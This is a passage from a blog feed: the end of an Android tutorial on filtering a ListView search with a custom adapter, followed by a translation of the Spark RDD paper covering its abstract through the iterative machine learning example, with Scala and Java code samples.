        android:background="@color/blue_title_bg"
        android:gravity="center_vertical"
        android:orientation="horizontal" >


        <com.zml.collrec.view.AutoClearEditText
            android:id="@+id/search_edit"
            android:layout_width="0dp"
            android:layout_height="wrap_content"
            android:layout_margin="5dp"
            android:layout_weight="1"
            android:background="@drawable/search_box"
            android:drawableRight="@drawable/app_icon_voice"
            android:focusable="true"
            android:hint="Search"
            android:padding="6dp"
            android:singleLine="true"
            android:textColor="@color/black"
            android:textSize="@dimen/micro_text_size" />

        <ImageButton
            android:id="@+id/search_button"
            android:layout_width="wrap_content"
            android:layout_height="wrap_content"
            android:layout_margin="5dp"
            android:background="#035AB2"
            android:paddingLeft="10dp"
            android:paddingRight="10dp"
            android:src="@mipmap/android_search_icon" />
    </LinearLayout>

    <ListView
        android:id="@+id/search_list"
        android:layout_width="match_parent"
        android:layout_height="match_parent"
        android:layout_below="@id/search_top_layout"
        android:divider="@null"
        android:dividerHeight="1dp"
        android:listSelector="@null"
        android:scrollbars="none"
         />

    </LinearLayout>


* SearchFragment.java

/**
 * @author 郑明亮    @email 1072307340@qq.com
 * @Time: 2016/8/1 1:35
 * @version 1.0
 * TODO
 */
public class SearchFragment extends Fragment implements AdapterView.OnItemClickListener, View.OnClickListener {

    // TODO: Rename parameter arguments, choose names that match
    // the fragment initialization parameters, e.g. ARG_ITEM_NUMBER
    private static final String ARG_PARAM1 = "param1";
    private static final String ARG_PARAM2 = "param2";

    List<Recomend>data = null;
    // TODO: Rename and change types of parameters
    private String mParam1;
    private String mParam2;
    RecomendAdapter adapter = null;

    private OnFragmentInteractionListener mListener;

    AutoClearEditText et_search; // custom EditText subclass
    ImageButton ib_search;
    ListView search_list;



    /**
     * Use this factory method to create a new instance of
     * this fragment using the provided parameters.
     *
     * @param param1 Parameter 1.
     * @param param2 Parameter 2.
     * @return A new instance of fragment SearchFragment.
     */
    // TODO: Rename and change types and number of parameters
    public static SearchFragment newInstance(String param1, String param2) {
        SearchFragment fragment = new SearchFragment();
        Bundle args = new Bundle();
        args.putString(ARG_PARAM1, param1);
        args.putString(ARG_PARAM2, param2);
        fragment.setArguments(args);
        return fragment;
    }

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        if (getArguments() != null) {
            mParam1 = getArguments().getString(ARG_PARAM1);
            mParam2 = getArguments().getString(ARG_PARAM2);
        }
    }

    @Override
    public View onCreateView(LayoutInflater inflater, ViewGroup container,
                             Bundle savedInstanceState) {
        View view = inflater.inflate(R.layout.fragment_search, container, false);

        initView(view);
        // Fill the list with mock data for now
        initData();
        return view;
    }

    private void initView(View view) {
        ib_search = (ImageButton) view.findViewById(R.id.search_button);
        et_search = (AutoClearEditText) view.findViewById(R.id.search_edit);
        search_list = (ListView) view.findViewById(R.id.search_list);
        search_list.setTextFilterEnabled(true); // enable text filtering on the ListView
        ib_search.setOnClickListener(this);
        // Attach a TextWatcher to the search box to react to input as it is typed
        et_search.addTextChangedListener(new TextWatcher() {
            @Override
            public void beforeTextChanged(CharSequence charSequence, int i, int i1, int i2) {

            }

            @Override
            public void onTextChanged(CharSequence charSequence, int start, int before, int count) {
                String keyword = charSequence.toString().trim();
                if (TextUtils.isEmpty(keyword)) {
                    search_list.clearTextFilter(); // empty query: clear the ListView filter
                } else {
                    search_list.setFilterText(keyword); // use the query as the filter keyword
                }
            }

            @Override
            public void afterTextChanged(Editable editable) {

            }
        });

    }

    private void initData(){
        data = new ArrayList<>();
        data.add(new Recomend("应用推荐","忙碌一天的你，怎么能没有一款好玩的游戏来放松一下呢"));
        data.add(new Recomend("好书推荐","读过一本好书，像交了一个益友。——臧克家"));
        data.add(new Recomend("养生推荐","三天不吃青，兩眼冒金星。寧可食無肉，不可飯無湯。吃面多喝湯，免得開藥方"));
        data.add(new Recomend("资讯推荐","风声雨声读书声，声声入耳；家事国事天下事，事事关心，快来看看吧"));
        data.add(new Recomend("更多推荐","吃喝玩乐学一应俱全，快来看看吧"));
        data.add(new Recomend("更多推荐","吃喝玩乐学一应俱全，快来看看吧"));
        data.add(new Recomend("更多推荐","吃喝玩乐学一应俱全，快来看看吧"));
        data.add(new Recomend("更多推荐","吃喝玩乐学一应俱全，快来看看吧"));
        adapter = new RecomendAdapter(getActivity(),data);
        search_list.setAdapter(adapter);
        search_list.setOnItemClickListener(this);
    }

    @Override
    public void onAttach(Context context) {
        super.onAttach(context);
    }

    @Override
    public void onDetach() {
        super.onDetach();
    }

    @Override
    public void onItemClick(AdapterView<?> adapterView, View view, int i, long l) {
        ScreenUtils.showToast(data.get(i).getTitle());
    }

    @Override
    public void onClick(View view) {
        switch (view.getId()){
            case R.id.search_button:
                String search = et_search.getText().toString().trim();
                if (TextUtils.isEmpty(search)){
                    search_list.clearTextFilter(); // empty query: clear the filter
                }else {
                    search_list.setFilterText(search); // use the query as the filter keyword
                }


                break;
            default:
                break;
        }
    }

}

As the comments point out, the one thing to remember is to enable filtering first with search_list.setTextFilterEnabled(true).
* Next comes the adapter, which holds the key code:

/**
 * @author 郑明亮   @email 1072307340@qq.com
 * @version 1.0
 * @time 2016/7/29 18:28
 * TODO
 */
public class RecomendAdapter extends BaseAdapter implements Filterable{
    Context context;
    List<Recomend> data;     // the list currently shown; replaced on every filter pass
    List<Recomend> backData; // backup of the original, unfiltered data
    MyFilter mFilter ;

    public RecomendAdapter(Context context, List<Recomend> data) {
        this.context = context;
        this.data = data;
        backData = data;
    }

    @Override
    public int getCount() {
        return data.size();
    }

    @Override
    public Object getItem(int i) {
        return data.get(i); // return the item actually displayed at this position
    }

    @Override
    public long getItemId(int i) {
        return i;
    }

    @Override
    public View getView(int i, View view, ViewGroup viewGroup) {

        if (view ==null){
            view = LayoutInflater.from(context).inflate(R.layout.fragment_recomend_item,null);
        }
        TextView tv_title = ViewHolder.get(view,R.id.tv_recomend_title);
        TextView tv_desc = ViewHolder.get(view,R.id.tv_recomend_desc);
        ImageView img = ViewHolder.get(view,R.id.iv_recomend_img);
        tv_title.setText(data.get(i).getTitle());
        tv_desc.setText(data.get(i).getDesc());
        Glide.with(context).load(R.drawable.default_head_icon).asBitmap().centerCrop().placeholder(R.mipmap.ic_launcher).into(img);
        return view;
    }

    // Called when the ListView's setFilterText() is invoked
    @Override
    public Filter getFilter() {
        if (mFilter ==null){
            mFilter = new MyFilter();
        }
        return mFilter;
    }

    // A Filter subclass that defines the filtering rule
    class MyFilter extends Filter{
        // The filtering rule lives in performFiltering(CharSequence)
        @Override
        protected FilterResults performFiltering(CharSequence charSequence) {
            FilterResults result = new FilterResults();
            List<Recomend> list ;
            if (TextUtils.isEmpty(charSequence)){ // empty keyword: show all the data
                list  = backData;
            }else { // otherwise collect the items that match the keyword
                list = new ArrayList<>();
                for (Recomend recomend:backData){
                    if (recomend.getTitle().contains(charSequence)||recomend.getDesc().contains(charSequence)){
                        LogUtil.d("performFiltering:"+recomend.toString());
                        list.add(recomend);
                    }

                }
            }
            result.values = list;       // store the matching list in FilterResults.values
            result.count = list.size(); // store its size in FilterResults.count

            return result;
        }

        // publishResults tells the adapter to refresh the UI
        @Override
        protected void publishResults(CharSequence charSequence, FilterResults filterResults) {
            data = (List<Recomend>)filterResults.values;
            LogUtil.d("publishResults:"+filterResults.count);
            if (filterResults.count>0){
                notifyDataSetChanged(); // the data changed
                LogUtil.d("publishResults:notifyDataSetChanged");
            }else {
                notifyDataSetInvalidated(); // the data is no longer valid
                LogUtil.d("publishResults:notifyDataSetInvalidated");
            }
        }
    }
}
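
The filtering rule itself does not depend on Android, so it can be tried out in isolation. The sketch below is a framework-free version of the same idea, assuming a hypothetical FilterItem class in place of Recomend and a hypothetical KeywordFilter helper: an empty keyword returns everything from the backup list, otherwise only items whose title or description contains the keyword are kept.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

// Hypothetical stand-in for the Recomend model class.
final class FilterItem {
    final String title;
    final String desc;

    FilterItem(String title, String desc) {
        this.title = title;
        this.desc = desc;
    }
}

// Hypothetical helper mirroring the rule used in performFiltering.
final class KeywordFilter {
    static List<FilterItem> filter(List<FilterItem> backup, CharSequence keyword) {
        if (keyword == null || keyword.length() == 0) {
            return new ArrayList<>(backup); // empty keyword: show all the data
        }
        List<FilterItem> matches = new ArrayList<>();
        for (FilterItem item : backup) {
            if (item.title.contains(keyword) || item.desc.contains(keyword)) {
                matches.add(item);
            }
        }
        return matches;
    }

    public static void main(String[] args) {
        List<FilterItem> all = Arrays.asList(
                new FilterItem("Apps", "a game to relax with"),
                new FilterItem("Books", "a good book is a good friend"),
                new FilterItem("News", "what is going on today"));
        System.out.println(filter(all, "good").size()); // items mentioning "good"
        System.out.println(filter(all, "").size());     // no keyword: everything
    }
}
```

Always filtering from the untouched backup list, rather than from the list currently displayed, is what lets a shorter keyword bring previously hidden items back.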

This post was first published on 安卓巴士.
If anything is unclear, feel free to leave a comment.

Author: zml_2015, posted 2016/8/1 2:53:14


↧

RDD: A Fault-Tolerant Abstraction for In-Memory Cluster Computing

August 1, 2016, 4:04 am


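This paper comes from Berkeley; its English title is "Resilient Distributed Datasets: A Fault-Tolerant Abstraction for In-Memory Cluster Computing". The translation below starts from the one published on ScienceNet (科学网), which is a good translation, and refines, corrects, and extends it. I have also added the figures and table data from the English original, as well as the passages the earlier translation left out. If any wording or reasoning is wrong, corrections are welcome.

Abstract

We present Resilient Distributed Datasets (RDDs), a distributed memory abstraction that keeps the fault-tolerance properties of data flow models such as MapReduce while letting programmers perform in-memory computations on large clusters. Current data flow systems handle two kinds of applications inefficiently: iterative algorithms, which are common in graph applications and machine learning, and interactive data mining tools. In both cases, keeping data in memory can improve performance dramatically. To achieve fault tolerance efficiently, RDDs provide a highly restricted form of shared memory: they are read-only and can only be created through bulk operations on other RDDs. Even so, RDDs are expressive enough to capture a wide class of computations, including MapReduce and specialized programming models for iterative jobs such as Pregel. Our implementation of RDDs outperforms Hadoop by more than 20x on iterative jobs and can be used to query a 1 TB dataset interactively with a latency of 5-7 seconds.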

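1. Introduction

High-level cluster programming models such as MapReduce and Dryad have been widely adopted in both industry and academia to process growing volumes of data. These systems simplify distributed programming by automatically providing locality-aware scheduling, fault tolerance, and load balancing, which lets a wide range of users analyze very large datasets on commodity clusters.

Most current cluster computing systems are based on an acyclic data flow model: records are loaded from stable storage (for example, a distributed file system), passed through a DAG of deterministic operators, and written back to stable storage. Knowledge of the data flow graph allows the runtime to schedule work and recover from faults automatically.

Although acyclic data flow is a powerful abstraction, some applications cannot be expressed efficiently this way. We focus on one class of applications that fit the acyclic model poorly: those that reuse a working set of data across multiple parallel operations. This class includes (1) iterative algorithms commonly used in machine learning and graph applications, which apply a similar function to the data at each step, and (2) interactive data mining tools, where a user repeatedly queries a subset of the data. Data-flow-based frameworks do not explicitly support working sets, so these applications have to write data out to disk and reload it on each query, which incurs significant overhead.

We propose a distributed memory abstraction called resilient distributed datasets (RDDs). It supports applications with working sets while retaining the attractive properties of data flow models: automatic fault tolerance, locality-aware scheduling, and scalability. RDDs let users explicitly cache a working set in memory across multiple queries so that later queries can reuse it, which greatly speeds them up.

RDDs provide a highly restricted form of shared memory: they are read-only, partitioned collections of records that can only be created through deterministic transformations (such as map, join, and group-by) on other RDDs. These restrictions are what make low-overhead fault tolerance possible. Unlike distributed shared memory systems, which need costly checkpointing and rollback, RDDs rebuild lost partitions through lineage: an RDD carries enough information about how it was derived from other RDDs to reconstruct lost partitions without checkpointing. Although RDDs are not a general shared memory abstraction, they offer a good balance of expressivity, scalability, and reliability, and they turn out to be well suited to a wide range of data-parallel applications.

We are not the first to point out the limitations of acyclic data flow. For example, Google's Pregel [21] is a programming model specialized for iterative graph algorithms, and Twister [13] and HaLoop [8] provide iterative MapReduce models. However, these systems offer restricted communication patterns for specific classes of applications. In contrast, RDDs are a more general abstraction for applications with working sets: users can explicitly name and materialize intermediate results, control their partitioning, and use them in operations of their choice (instead of having the runtime loop through a fixed series of MapReduce steps). RDDs can express Pregel, iterative MapReduce, and applications that neither of these models captures well, such as interactive data mining tools (where a user loads a dataset into memory and runs ad-hoc queries).

We have implemented RDDs in a system called Spark, which is being used to develop a variety of parallel applications in our organization. Spark is implemented in Scala [5] and provides a language-integrated programming interface similar to DryadLINQ [34], which makes parallel jobs easy to write. In addition, Spark can be used interactively to query big datasets from a modified version of the Scala interpreter. We believe that Spark is the first system to allow an efficient, general-purpose programming language to be used interactively to analyze large datasets on a cluster.

We evaluate RDDs through both microbenchmarks and user applications. Spark is more than 20x faster than Hadoop for iterative applications, speeds up a data analytics report by more than 40x, and can scan a 1 TB dataset interactively with 5-7 seconds of latency. We have also implemented the Pregel and HaLoop programming models on top of Spark as libraries, including their placement optimizations, in roughly 100 and 200 lines of Scala respectively. Finally, we have taken advantage of the deterministic nature of RDDs to build rddbg, a debugging tool for Spark that uses lineage to rebuild the RDDs created during a job and re-run tasks on them in a conventional debugger.

The paper first introduces RDDs in Section 2. Section 3 then presents the Spark API, Section 4 shows how RDDs can express several parallel applications (including Pregel and HaLoop), Section 5 discusses the representation of RDDs in Spark and the job scheduler, Section 6 describes the implementation and rddbg, Section 7 evaluates RDDs, Section 8 surveys related work, and Section 9 concludes.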

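2. Resilient Distributed Datasets (RDDs)

This section describes RDDs and the programming model. We first discuss our goals (2.1), then define RDDs (2.2), discuss Spark's programming model (2.3), give an example (2.4), and finally compare RDDs with distributed shared memory (2.5).

2.1 Goals and Overview

Our goal is an abstraction that supports applications with working sets (that is, applications that reuse an intermediate result in multiple parallel operations) while preserving the attractive properties of MapReduce and related models: automatic fault tolerance, locality-aware scheduling, and scalability. RDDs should be as easy to program against as data flow models, yet able to express computations with working sets efficiently.

Of these properties, fault tolerance is the hardest to support efficiently. In general there are two ways to make a distributed dataset fault-tolerant: checkpointing the data or logging the updates made to it. In our target setting, large-scale data analytics, checkpointing is expensive: it requires replicating large datasets across machines over the datacenter network, whose bandwidth is typically far lower than memory bandwidth, and it also consumes additional storage (replicating data in RAM reduces the total amount that can be cached, while logging it to disk slows applications down). We therefore chose to log updates. Logging updates is also expensive if there are many of them, however, so RDDs only support coarse-grained transformations, where a single operation is applied to many records. We then record the series of transformations used to build an RDD (its lineage) and use it to recover lost partitions.

Although supporting only coarse-grained transformations restricts the programming model, we have found RDDs suitable for a wide range of applications. They fit data-parallel batch analytics especially well, including data mining, machine learning, and graph algorithms, because these programs naturally apply the same operation to many records. RDDs are less suitable for applications that asynchronously update shared state, such as a parallel web crawler. Our goal is to provide an efficient programming model for the large body of analytics applications and to leave other applications to specialized systems.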

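2.2 The RDD Abstraction

An RDD is a read-only, partitioned collection of records. RDDs can only be created through deterministic operations on either data in stable storage or other existing RDDs. We call these operations transformations, for example map, filter, groupBy, and join, to distinguish them from the other operations that programmers apply to RDDs.

RDDs do not need to be materialized at all times. An RDD has enough information about how it was derived from other RDDs (its lineage) to compute its partitions from data in stable storage.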

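2.3 Programming Model

In Spark, RDDs are represented as objects, and transformations are invoked through methods on these objects.

After defining one or more RDDs, programmers can use them in actions. Actions are operations that return a value to the application or export data to a storage system, for example count (which returns the number of elements in the RDD), collect (which returns the elements themselves), and save (which writes the RDD to a storage system). In Spark, an RDD is only computed the first time it is used in an action (it is lazily evaluated), which lets the runtime pipeline several transformations when building an RDD.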
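
The distinction between transformations and actions can be illustrated with a small single-machine sketch. LazyDataset below is a hypothetical class, not Spark's API: map and filter only record what to do, and nothing runs until an action such as count or collect is called. Unlike Spark, this sketch materializes an intermediate list per step instead of pipelining, which is a simplification.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.concurrent.atomic.AtomicInteger;
import java.util.function.Function;
import java.util.function.Predicate;
import java.util.function.Supplier;

// Hypothetical single-machine stand-in for an RDD; not Spark's API.
final class LazyDataset<T> {
    private final Supplier<List<T>> compute; // recipe for building the data on demand

    private LazyDataset(Supplier<List<T>> compute) {
        this.compute = compute;
    }

    static <T> LazyDataset<T> fromList(List<T> source) {
        return new LazyDataset<>(() -> new ArrayList<>(source));
    }

    // Transformation: records the step, runs nothing yet.
    <U> LazyDataset<U> map(Function<T, U> f) {
        Supplier<List<T>> parent = compute;
        return new LazyDataset<>(() -> {
            List<U> out = new ArrayList<>();
            for (T item : parent.get()) out.add(f.apply(item));
            return out;
        });
    }

    // Transformation: records the step, runs nothing yet.
    LazyDataset<T> filter(Predicate<T> keep) {
        Supplier<List<T>> parent = compute;
        return new LazyDataset<>(() -> {
            List<T> out = new ArrayList<>();
            for (T item : parent.get()) if (keep.test(item)) out.add(item);
            return out;
        });
    }

    // Actions: force the computation and return a value to the caller.
    long count() { return compute.get().size(); }

    List<T> collect() { return compute.get(); }

    public static void main(String[] args) {
        AtomicInteger calls = new AtomicInteger();
        LazyDataset<Integer> lengths = LazyDataset
                .fromList(Arrays.asList("ERROR a", "INFO b", "ERROR cc"))
                .filter(s -> s.startsWith("ERROR"))
                .map(s -> { calls.incrementAndGet(); return s.length(); });
        System.out.println("map calls before the action: " + calls.get());
        System.out.println("count: " + lengths.count());
        System.out.println("map calls after the action: " + calls.get());
    }
}
```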

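Programmers can also control two other aspects of RDDs: caching and partitioning. A user may ask for an RDD to be cached, in which case the runtime stores the partitions it has already computed to speed up later reuse. Cached RDDs are normally kept in memory, but they spill to disk if there is not enough memory.

RDDs also optionally let users specify a partitioning order based on a key associated with each record. We currently support hash and range partitioning. For example, an application may request that two RDDs be hash-partitioned in the same way, so that records with the same key end up on the same machine, to speed up joins between them. Consistent partition placement across iterations is one of the main optimizations in Pregel and HaLoop, so we let users express this optimization as well.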
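
To see why identical hash partitioning helps joins, consider the following single-machine sketch. The class and method names are hypothetical and the "partitions" are just in-memory maps: because both datasets use the same partitioner, partition i of one side only ever needs partition i of the other side, so a real system would not have to move records between machines.

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.TreeMap;

// Hypothetical illustration of co-partitioned joins; not Spark's API.
final class CoPartitionedJoin {
    // The same function must be used for both datasets.
    static int partitionOf(String key, int numPartitions) {
        return Math.floorMod(key.hashCode(), numPartitions);
    }

    static <V> List<Map<String, V>> hashPartition(Map<String, V> data, int numPartitions) {
        List<Map<String, V>> parts = new ArrayList<>();
        for (int i = 0; i < numPartitions; i++) parts.add(new HashMap<>());
        for (Map.Entry<String, V> e : data.entrySet()) {
            parts.get(partitionOf(e.getKey(), numPartitions)).put(e.getKey(), e.getValue());
        }
        return parts;
    }

    // Joins partition i of the left side with partition i of the right side only.
    static Map<String, String> join(List<Map<String, String>> left,
                                    List<Map<String, String>> right) {
        Map<String, String> joined = new TreeMap<>();
        for (int i = 0; i < left.size(); i++) {
            for (Map.Entry<String, String> e : left.get(i).entrySet()) {
                String other = right.get(i).get(e.getKey());
                if (other != null) joined.put(e.getKey(), e.getValue() + "|" + other);
            }
        }
        return joined;
    }

    public static void main(String[] args) {
        Map<String, String> names = new HashMap<>();
        names.put("u1", "alice");
        names.put("u2", "bob");
        Map<String, String> pages = new HashMap<>();
        pages.put("u1", "home");
        pages.put("u3", "cart");
        System.out.println(join(hashPartition(names, 4), hashPartition(pages, 4)));
    }
}
```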

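2.4 Example: Console Log Mining

We illustrate RDDs with a concrete example. Suppose a large website is experiencing errors and an operator wants to search terabytes of logs in the Hadoop file system (HDFS) to find the cause. With Spark, the operator can load just the error messages from the logs into the memory of a set of nodes and query them interactively. She would first type the following Scala commands into the Spark interpreter:

1	lines = spark.textFile("hdfs://...")
2	errors = lines.filter(_.startsWith("ERROR"))
3	errors.cache()

Line 1 defines an RDD backed by an HDFS file (as a collection of lines of text), line 2 derives a filtered RDD from it, and line 3 asks for errors to be cached. Note that the argument to filter is Scala syntax for a closure.

At this point no work has been performed on the cluster. However, the user can now use the RDD in actions, for example to count the number of error messages:

errors.count()

The user can also apply further transformations to the RDD and use their results:

// Count errors mentioning MySQL:
errors.filter(_.contains("MySQL")).count()

// Return the time fields of errors mentioning
// HDFS as an array (assuming time is field
// number 3 in a tab-separated format):
errors.filter(_.contains("HDFS"))
      .map(_.split('\t')(3))
      .collect()

After the first action involving errors runs, Spark caches the partitions of errors in memory, which greatly speeds up subsequent computations on it. Note that the base RDD, lines, is never cached. That is desirable because the error messages may be only a small fraction of the original data (small enough to fit into memory).

Finally, to illustrate how the model achieves fault tolerance, Figure 1 shows the lineage graph for the third query. We start from the lines RDD, apply a filter to obtain errors, then apply a further filter and a map to obtain a new RDD, and run collect on that RDD. The Spark scheduler pipelines the last two transformations and sends a set of tasks to the nodes holding the cached partitions of errors. In addition, if a partition of errors is lost, Spark rebuilds it by applying the filter to only the corresponding partition of lines.

Figure 1: Lineage graph for the third query in the example. Boxes represent RDDs and arrows represent transformations.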
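
The recovery step described above, rebuilding a lost errors partition from the matching lines partition, can be sketched on one machine as follows. FilteredPartitions is a hypothetical class, the parent partitions are plain lists standing in for data in stable storage, and a partition is "lost" simply by removing it from the cache.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.function.Predicate;

// Hypothetical illustration of lineage-based recovery; not Spark's implementation.
final class FilteredPartitions {
    private final List<List<String>> parentPartitions; // stands in for "lines"
    private final Predicate<String> predicate;         // the recorded transformation
    private final Map<Integer, List<String>> cache = new HashMap<>();
    int recomputations = 0;

    FilteredPartitions(List<List<String>> parentPartitions, Predicate<String> predicate) {
        this.parentPartitions = parentPartitions;
        this.predicate = predicate;
    }

    // Returns partition i, recomputing it from its parent partition if it is not cached.
    List<String> partition(int i) {
        List<String> cached = cache.get(i);
        if (cached != null) return cached;
        recomputations++;
        List<String> rebuilt = new ArrayList<>();
        for (String line : parentPartitions.get(i)) {
            if (predicate.test(line)) rebuilt.add(line);
        }
        cache.put(i, rebuilt);
        return rebuilt;
    }

    // Simulates losing the node that cached partition i.
    void lose(int i) {
        cache.remove(i);
    }

    public static void main(String[] args) {
        List<List<String>> lines = Arrays.asList(
                Arrays.asList("ERROR disk", "INFO ok"),
                Arrays.asList("INFO ok", "ERROR net"));
        FilteredPartitions errors = new FilteredPartitions(lines, s -> s.startsWith("ERROR"));
        errors.partition(0);
        errors.partition(1);
        errors.lose(1);
        System.out.println(errors.partition(1) + " recomputations=" + errors.recomputations);
    }
}
```

Only the lost partition is recomputed; partition 0 stays cached and is never touched again.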

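2.5 RDDs vs. Distributed Shared Memory

To further understand RDDs as a distributed memory abstraction, Table 1 compares them against distributed shared memory (DSM) [24]. In DSM systems, applications read and write arbitrary locations in a global address space. (Under this definition we include not only traditional shared memory systems, but also systems where applications share data through a distributed hash table or a distributed file system, such as Piccolo [28].) DSM is a very general abstraction, but this generality makes it harder to implement efficient fault tolerance on commodity clusters.

The main difference between RDDs and DSM is that RDDs can only be created ("written") through bulk transformations, while DSM allows reads and writes to each memory location. Restricting applications to bulk writes in this way is what makes efficient fault tolerance possible. In particular, RDDs do not incur the overhead of checkpointing, because they can be recovered using lineage. Furthermore, only the lost partitions of an RDD need to be recomputed upon failure, and they can be recomputed in parallel on different nodes without rolling back the whole program.

Aspect	RDDs	Distributed shared memory (DSM)
Reads	Bulk or fine-grained	Fine-grained
Writes	Bulk transformations	Fine-grained
Consistency	Trivial (RDDs are immutable)	Up to the application or runtime
Fault recovery	Fine-grained and low-overhead (using lineage)	Requires checkpoints and program rollback
Straggler mitigation	Possible using backup tasks	Difficult
Work placement	Automatic, based on data locality	Up to the application (runtimes aim for transparency)
Behavior if not enough RAM	Similar to existing data flow systems	Poor performance (swapping?)
Table 1: Comparison of RDDs with DSM

Note that RDDs can also mitigate slow nodes (stragglers) by running backup copies of tasks, as MapReduce does [12]. Backup tasks would be hard to implement with DSM, because a task and its copy would both read and write the same memory locations.

RDDs have two further benefits over DSM. First, for bulk operations on RDDs, the runtime can schedule tasks based on data locality to improve performance. Second, for scan-based operations, if there is not enough memory to cache a whole RDD, it is cached partially: partitions that do not fit in memory are stored on disk, and performance is then similar to that of current data flow systems.

A final point of comparison is the granularity of reads. Many actions on RDDs (such as count and collect) are bulk reads that scan the whole dataset, which lets tasks be scheduled close to the data. RDDs also support fine-grained reads, however, through key lookups on hash-partitioned or range-partitioned RDDs.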

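3. Spark Programming Interface

Spark provides the RDD abstraction through an API in Scala [5], a statically typed, functional, object-oriented language for the JVM. We chose Scala for its conciseness (which is convenient for interactive use) and its efficiency (due to static typing). Nothing about the RDD abstraction requires a functional language, however; RDDs could also be provided in other languages by using classes to represent user functions, as is done in Hadoop [2].

To use Spark, developers write a driver program that connects to a cluster to run workers, as shown in Figure 2. The driver defines one or more RDDs and invokes actions on them. Workers are long-lived processes that cache RDD partitions in memory as Java objects.

Figure 2: The Spark runtime. The user's driver program launches multiple workers, which read data blocks from a distributed file system and cache computed RDD partitions in memory.

As the example in Section 2.4 showed, users pass arguments to RDD operations, for instance a closure (a functional programming concept) to map. Scala represents each closure as a Java object; when a closure is passed as an argument, this object is serialized and shipped over the network to be loaded on other nodes. Scala also saves any variables bound in the closure as fields of the Java object. For example, the code var x = 5; rdd.map(_ + x) adds 5 to each element of an RDD. Overall, Spark's language integration is similar to DryadLINQ's.

RDDs themselves are statically typed objects parameterized by an element type. For example, RDD[Int] is an RDD of integers. We omit the type parameter in most of our examples, because Scala supports type inference.

Although exposing RDDs in Scala is conceptually simple, we had to work around some issues with Scala's closure objects using reflection. Making Spark usable from the Scala interpreter also required more work, which we discuss in Section 6. In any case, we did not need to modify the Scala compiler.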

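3.1 RDD Operations in Spark

Table 2 lists the RDD transformations and actions available in Spark. We give the signature of each operation, with type parameters in square brackets. Recall that transformations are lazy operations that define a new RDD, while actions launch a computation and either return a value to the user program or write data to external storage.

Transformations	map(f : T ⇒ U) : RDD[T] ⇒ RDD[U]
	filter(f : T ⇒ Bool) : RDD[T] ⇒ RDD[T]
	flatMap(f : T ⇒ Seq[U]) : RDD[T] ⇒ RDD[U]
	sample(fraction : Float) : RDD[T] ⇒ RDD[T] (Deterministic sampling)
	groupByKey() : RDD[(K, V)] ⇒ RDD[(K, Seq[V])]
	reduceByKey(f : (V, V) ⇒ V) : RDD[(K, V)] ⇒ RDD[(K, V)]
	union() : (RDD[T], RDD[T]) ⇒ RDD[T]
	join() : (RDD[(K, V)], RDD[(K, W)]) ⇒ RDD[(K, (V, W))]
	cogroup() : (RDD[(K, V)], RDD[(K, W)]) ⇒ RDD[(K, (Seq[V], Seq[W]))]
	crossProduct() : (RDD[T], RDD[U]) ⇒ RDD[(T, U)]
	mapValues(f : V ⇒ W) : RDD[(K, V)] ⇒ RDD[(K, W)] (Preserves partitioning)
	sort(c : Comparator[K]) : RDD[(K, V)] ⇒ RDD[(K, V)]
	partitionBy(p : Partitioner[K]) : RDD[(K, V)] ⇒ RDD[(K, V)]
Actions	count() : RDD[T] ⇒ Long
	collect() : RDD[T] ⇒ Seq[T]
	reduce(f : (T, T) ⇒ T) : RDD[T] ⇒ T
	lookup(k : K) : RDD[(K, V)] ⇒ Seq[V] (On hash/range partitioned RDDs)
	save(path : String) : Outputs RDD to a storage system, e.g., HDFS
Table 2: RDD transformations and actions available in Spark

Note that some operations, such as join, are only available on RDDs of key-value pairs. The function names were chosen to match other APIs in Scala and other functional languages; for example, map is a one-to-one mapping, while flatMap maps each input value to one or more outputs (similar to the map in MapReduce).

In addition to these operations, users can ask for an RDD to be cached. They can also obtain an RDD's partition order, which is represented by a Partitioner class, and partition another RDD according to it. Operations such as groupByKey, reduceByKey, and sort automatically produce a hash-partitioned or range-partitioned RDD.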

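4. Example Applications

We now show how RDDs can express several data-parallel applications. We start with iterative machine learning applications (4.1), then show how RDDs can express several existing cluster programming models: MapReduce (4.2), Pregel (4.3), and HaLoop (4.4). Finally, we discuss applications for which RDDs are not suitable (4.5).

4.1 Iterative Machine Learning

Many machine learning algorithms are iterative in nature because they run iterative optimization procedures, such as gradient descent, to optimize an objective function. These algorithms can be sped up substantially if their working set fits in memory. They also typically rely on bulk operations such as maps and sums, which makes them easy to express with RDDs.

As an example, the following program implements logistic regression [15], a common classification algorithm that searches for a hyperplane w that best separates two sets of points (for example, spam and non-spam emails). The algorithm uses gradient descent: it starts w at a random value, and on each iteration it sums a function of w over the data and moves w in a direction that improves it.

val points = spark.textFile(...)
                  .map(parsePoint).persist()
var w = // random initial vector
for (i <- 1 to ITERATIONS) {
  val gradient = points.map { p =>
    p.x * (1 / (1 + exp(-p.y * (w dot p.x))) - 1) * p.y
  }.reduce((a, b) => a + b)
  w -= gradient
}

We start by defining a cached RDD called points as the result of a map transformation on a text file that parses each line of text into a Point object. We then repeatedly run map and reduce on points, computing the gradient at each iteration by summing a function of the current w. Section 7.1 shows that caching points in memory in this way is much faster than loading the data from disk and parsing it on every iteration.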
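
For readers who want to run the update rule locally, here is a plain Java sketch of the same loop on a small in-memory dataset. It is not Spark code: the class name is hypothetical, labels are assumed to be +1 or -1, and w starts at zero rather than at a random vector so that the result is reproducible.

```java
// Hypothetical single-machine sketch of the gradient loop; not Spark code.
final class LogisticRegressionSketch {
    static double dot(double[] a, double[] b) {
        double sum = 0.0;
        for (int d = 0; d < a.length; d++) sum += a[d] * b[d];
        return sum;
    }

    // xs[i] is a feature vector and ys[i] its label, assumed to be +1 or -1.
    static double[] train(double[][] xs, double[] ys, int iterations) {
        double[] w = new double[xs[0].length]; // zeros instead of random (assumption)
        for (int it = 0; it < iterations; it++) {
            double[] gradient = new double[w.length];
            for (int i = 0; i < xs.length; i++) {
                // "map": the per-point term x * (1 / (1 + exp(-y * (w . x))) - 1) * y
                double scale = (1.0 / (1.0 + Math.exp(-ys[i] * dot(w, xs[i]))) - 1.0) * ys[i];
                // "reduce": sum the per-point terms into one gradient vector
                for (int d = 0; d < w.length; d++) gradient[d] += scale * xs[i][d];
            }
            for (int d = 0; d < w.length; d++) w[d] -= gradient[d];
        }
        return w;
    }

    public static void main(String[] args) {
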